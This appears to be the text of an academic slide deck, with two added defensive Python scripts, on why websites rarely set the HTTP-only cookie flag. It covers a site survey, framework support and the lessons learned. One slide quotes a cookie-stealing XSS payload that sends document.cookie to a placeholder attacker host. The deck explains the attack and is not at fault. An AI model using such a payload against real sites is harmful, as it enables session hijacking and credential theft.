
Why aren’t HTTP-only cookies more widely deployed?
Yuchen Zhou, David Evans
Department of Computer Science, University of Virginia
HTTP-only Cookies

Cookie attributes:
  Name = value;
  Domain = value;
  Expiration time = value;
  Path = value;
  Secure;
  Httponly

The HTTP-only field prevents cookies from being read via document.cookie.
Cookie-stealing XSS (diagram): the attacker injects script into the page; the script reads the cookie (the user’s credentials) and sends it back to the attacker, who can then modify the DOM, disclose the user’s confidential data, or install a trojan. The injected payload shown on the slide:
  <img src = http://evilsite/stealyourcookie.cgi?value=document.cookie>
HTTP-only Deployment Timeline (2002–2010)

Client/Other events:
• IE6 introduces HTTP-only
• Firefox extension supports HTTP-only
• US-CERT vulnerability note on XST attacks
• w3.org specifies that browsers should disallow TRACE XMLHTTPRequests
• TRACE method disabled by all major browsers
• Firefox 2.0.0.5 supports HTTP-only
• IETF standard draft includes HTTP-only
• IE8 fixes XMLHTTPResponse exploit

Server-side events:
• Lots of major sites still don’t use HTTP-only cookie
• Apache.org compromised by cookie-stealing XSS attacks
• Django developers consider supporting HTTP-only, but compatibility concerns held them back
• Python supports HTTP-only; Django unofficial patch available
• Ruby on Rails supports HTTP-only
• Still no official Django support for HTTP-only (2010)
• Ruby on Rails sets HTTP-only on by default
• TRACE method is still on by default on Apache servers and major websites [10]
Methodology
• 50 sites collected from Alexa.com world top 100 popular sites.
• Manually registered accounts and collected post-login cookie properties of all sites.
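The two slides above describe the HTTP-only attribute on a Set-Cookie header and the survey method (collect each site’s authentication cookies and check whether they carry HTTP-only). The following Python script is an added example, not code from the slides or from the authors: it emits session cookies with Python’s own http.cookies module (the module the slides refer to when they say Python supports HTTP-only from 2.6) with the flags on by default, and then tallies a small constructed set of observations the way the survey does. The site names, cookie values and the function names are assumptions constructed for the example.

```python
"""Added example (not from the Zhou/Evans slides): emit Set-Cookie headers with
HttpOnly/Secure on by default, then audit constructed Set-Cookie observations
and classify each site the way the survey does."""
from collections import Counter
from http.cookies import SimpleCookie


def session_set_cookie(name, value, secure=True, httponly=True, path="/"):
    """Return a Set-Cookie header value for a session cookie.

    HttpOnly and Secure default to on, i.e. the opt-out default the slides
    argue frameworks should adopt; callers must explicitly turn them off.
    """
    c = SimpleCookie()
    c[name] = value
    c[name]["path"] = path
    if secure:
        c[name]["secure"] = True
    if httponly:
        c[name]["httponly"] = True
    # http.cookies emits attributes in alphabetical order: HttpOnly; Path; Secure
    return c[name].OutputString()


def cookie_flags(set_cookie_header):
    """Parse one Set-Cookie header value (without the 'Set-Cookie:' prefix)
    and return (cookie_name, secure, httponly). http.cookies recognises
    Secure and HttpOnly as flag attributes and stores them as True."""
    c = SimpleCookie()
    c.load(set_cookie_header)
    name, morsel = next(iter(c.items()))
    return name, bool(morsel["secure"]), bool(morsel["httponly"])


# Constructed sample observations (hypothetical sites): for each site, the
# authentication cookie captured before and/or after login.
SAMPLE_SITES = {
    "site-a.example": [("before_login", "sid=a1; Path=/; Secure; HttpOnly")],
    "site-b.example": [("before_login", "sid=b1; Path=/"),
                       ("after_login", "auth=b2; Path=/; Domain=.site-b.example; HttpOnly")],
    "site-c.example": [("before_login", "sid=c1; Path=/; Secure"),
                       ("after_login", "auth=c2; Path=/; Secure")],
    "site-d.example": [("after_login", "auth=d1; Max-Age=3600; HttpOnly")],
}


def classify_site(observations):
    """Return the phase ('before_login' / 'after_login') in which the site
    first sets an HTTP-only authentication cookie, or 'no_httponly'."""
    for phase, header in observations:
        _, _, httponly = cookie_flags(header)
        if httponly:
            return phase
    return "no_httponly"


def survey(sites):
    """Tally sites by category, mirroring the survey's pie-chart buckets."""
    return Counter(classify_site(obs) for obs in sites.values())


if __name__ == "__main__":
    print(session_set_cookie("sid", "abc"))
    for category, count in sorted(survey(SAMPLE_SITES).items()):
        print(f"{category}: {count}")
```

Running the script prints the emitted header and the per-category counts for the constructed sample; pointing `SAMPLE_SITES` at real captured headers reproduces the survey’s classification.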
Survey Results
(Pie charts.) Of the 50 sites, 24 use HTTP-only authentication cookies (13 set them after login, 11 before login) and 26 have no HTTP-only authentication cookies.
Kapil Singh et al (2010 Oakland) also gave similar results on the deployment of HTTP-only cookies: HTTP-only on 30/100 sites, and on 16.2% of 100,000 sites.
Survey Results on Web Frameworks

Framework                    Version   Date        HTTP-only Support   HTTP-only Default
(name not extracted)         1.1.1     July 2009   No                  –
Authkit                      0.4.4     July 2009   No                  –
Repoze.who                   1.0.10    2009        No                  –
(name not extracted)         2.3.2     Mar 2009    Yes                 Yes
(name not extracted)         2.2.2     Nov 2008    Yes                 No
(name not extracted)         2.1.2     Oct 2008    No                  –
(name not extracted)         4.0       Feb 2010    Yes                 Yes
(name not extracted)         1.4       Feb 2010    Yes                 No
(name not extracted)         3.0       Feb 2010    No                  No
Why Aren’t HTTP-only Cookies
More Widely Deployed?
Page Functionality
• Does the DOM need to read cookies?
  – Only 1 site out of 50 showed a minor malfunction, on its web IM gadget (renren.com).
Can We Circumvent HTTP-only?
(Diagram: injected script reads the cookie into var cookie and sends it back.)
Can We Circumvent HTTP-only?
• Cross-site tracing
• AJAX based attack
(Bar charts, y-axis 0–30. Chart 1 compares sites with Trace enabled vs Trace disabled; bar values 2, 22, 6, 20. Chart 2 compares insecure vs secure sites; bar values 0, 5, 24, 21.)
Protection Effectiveness
(Diagram; labels: CSRF, hard drive.)
Software Stack Compatibility
“Hmm, we probably can't use a patch that requires a patched python. Any different solution?”
• Python didn’t support HTTP-only until 2.6
• Django is built on Python, so its deployment of HTTP-only stalled.
Standards Compliance
“Also, could you point me to where the RFC is talking about 'httponly'? I couldn't find it at all.”
• The cookie specification was never updated after HTTP-only was introduced.
• Without a spec to point to, developers hesitate to make the change.
Difficulty in Deploying in Both Ends
Server side:
• Add HTTP-only field to cookies
• Disable Trace and implement Set-cookie securely
Client side:
• Interpret HTTP-only field correctly
• Implement HTTP-only defense correctly
• Similar deployment issues:
  – Set-cookie2 header in RFC2965
  – Updating TCP protocol
Lessons Learned
① Maintain backward compatibility (e.g. Httponly vs. Httponly = true)
② Be aggressive on client side.
③ Opt-in? Opt-out!
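Lesson ① above contrasts the bare “Httponly” flag with the “Httponly = true” spelling. The following Python snippet is an added example, not from the slides or their authors, showing how a user agent (or any defender-side cookie checker) can interpret the field correctly whichever spelling a server emits: the attribute name is matched case-insensitively and any attached value is ignored, which is the parsing rule RFC 6265 (section 5.2) gives for Secure and HttpOnly. The function names and the sample headers are constructed for the example.

```python
"""Added example (not the slides' own code): lenient, RFC 6265-style parsing of
Set-Cookie attributes so that 'HttpOnly', 'httponly' and 'Httponly = true' all
mark the cookie as unreadable from script."""

FLAG_ATTRIBUTES = ("httponly", "secure")


def parse_set_cookie(header):
    """Return (name, value, attrs) for one Set-Cookie header value.

    attrs maps lower-cased attribute names to their values; the flag
    attributes HttpOnly and Secure map to True regardless of any value
    written after them (RFC 6265 tells user agents to ignore that value).
    """
    first, *rest = header.split(";")
    name, _, value = first.partition("=")
    attrs = {}
    for piece in rest:
        key, _, val = piece.partition("=")
        key = key.strip().lower()
        if not key:
            continue  # tolerate a trailing ';' or doubled separators
        if key in FLAG_ATTRIBUTES:
            attrs[key] = True  # '= true', '= false' or nothing: still a flag
        else:
            attrs[key] = val.strip()
    return name.strip(), value.strip(), attrs


def is_script_readable(header):
    """True when document.cookie would expose this cookie, i.e. no HttpOnly."""
    _, _, attrs = parse_set_cookie(header)
    return not attrs.get("httponly", False)


# Constructed spellings a client may encounter (hypothetical sample headers).
VARIANTS = [
    "sid=1; HttpOnly",
    "sid=1; httponly",
    "sid=1; Httponly = true",
    "sid=1; Path=/; Secure",
]


def audit(headers):
    """Map each header to whether script could read the cookie it sets."""
    return {h: is_script_readable(h) for h in headers}


if __name__ == "__main__":
    for header, readable in audit(VARIANTS).items():
        print(f"{header!r:35} script-readable: {readable}")
```

Only the last variant, which lacks the attribute entirely, is reported as readable; the three HttpOnly spellings are all recognised, which is the backward-compatible behaviour lesson ① asks for on the client side.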
Backup Slides

Survey Results
• Kapil Singh et al (2010 Oakland) also proved similar results on the deployment of HTTP-only cookies.

Survey Results on More Sites

Page Functionality
• Google analytics?